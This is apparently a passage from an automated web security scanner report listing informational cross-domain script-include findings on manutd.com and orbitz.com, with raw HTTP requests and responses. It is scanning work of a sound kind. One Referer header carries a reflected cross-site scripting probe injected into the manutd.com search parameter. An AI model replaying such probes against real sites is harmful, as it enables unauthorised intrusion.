Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...
20.79. http://www.manutd.com/Search-Results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...
20.80. http://www.manutd.com/Splash-Page.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Splash-Page.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Splash-Page.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 15275
Cache-Control: public, max-age=363
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--<meta http-equiv="REFRESH" content="0; url=http://www.manutd.com/defaul
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
20.81. http://www.manutd.com/en.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 26620
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:49:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...
20.82. http://www.manutd.com/en/Club/Sponsors.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...
20.83. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Fanzone/Competition-And-Polls.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/Fanzone/Competition-And-Polls.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.7.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 19323
Cache-Control: public, max-age=1
Date: Mon, 03 Oct 2011 00:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
20.84. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.2.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 28270
Cache-Control: public, max-age=553
Date: Sun, 02 Oct 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...
20.85. http://www.manutd.com/en/One-United.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/One-United.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/One-United.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.3.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 23135
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:54:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...
20.86. http://www.orbitz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:06:46 GMT
Content-Length: 174769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=60&width=468&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad336x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=600&width=336&adType=noframe&pos=external&"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<li>
                    <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&"></script>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...
20.87. http://www.orbitz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; mbox=session#1317600406536-142286#1317603490|PC#1317600406536-142286.19#1320193630|check#true#1317601690; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598037080:ss=1317596806325

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2189p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:33:20 GMT
Content-Length: 175578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=60&width=468&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad336x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=600&width=336&adType=noframe&pos=external&"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<li>
                    <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...
20.88. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /App/SubmitQuickSearch?z=bfe6&r=h HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
